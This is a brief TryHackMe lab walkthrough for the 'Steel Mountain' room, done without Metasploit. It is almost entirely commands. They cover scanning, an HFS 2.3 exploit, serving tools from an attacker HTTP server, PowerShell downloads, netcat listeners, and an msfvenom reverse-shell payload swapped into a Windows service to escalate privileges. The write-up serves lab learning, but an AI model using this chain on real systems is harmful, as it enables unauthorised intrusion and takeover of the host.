TryHackMe — Steel Mountain w/o MSF
Utilize PowerShell commands and winPEAS to enumerate the system and collect the relevant information to escalate privilege.

Machine Information:

[1]NMAP Scan
sudo nmap -A -T -p- 10.10.255.1 -oN nmap_scan

[2]Research vulnerability
searchsploit hfs 2.3
searchsploit -x 39161.py

[3]Edit exploit

[4]Setup HTTP server to serve nc.exe and winPEAS
sudo python -m SimpleHTTPServer 80

[5]Setup a netcat listener then run exploit
nc -lvnp 4444
python exploit.py 10.10.255.1 8080


[6]Download winPEAS for Privilege Escalation
powershell -c “Invoke-WebRequest -OutFile winPEAS.exe http://10.11.17.48/winPEAS.exe”


[7]Run winPEAS
winPEAS.exe


[8]Create msfvenom payload and setup a netcat listener
msfvenom -p windows/shell_reverse_tcp LHOST=10.11.17.48 LPORT=1234 -f exe -o ASCService.exe
nc -lvnp 1234

[9]Stop service
sc stop AdvancedSystemCareService9

[10]Download payload under the directory of the target service then start service
powershell -c “Invoke-WebRequest -OutFile ASCService.exe http://10.11.17.48/ASCService.exe"
sc start AdvancedSystemCareService9



References:
https://tryhackme.com/room/steelmountain
https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS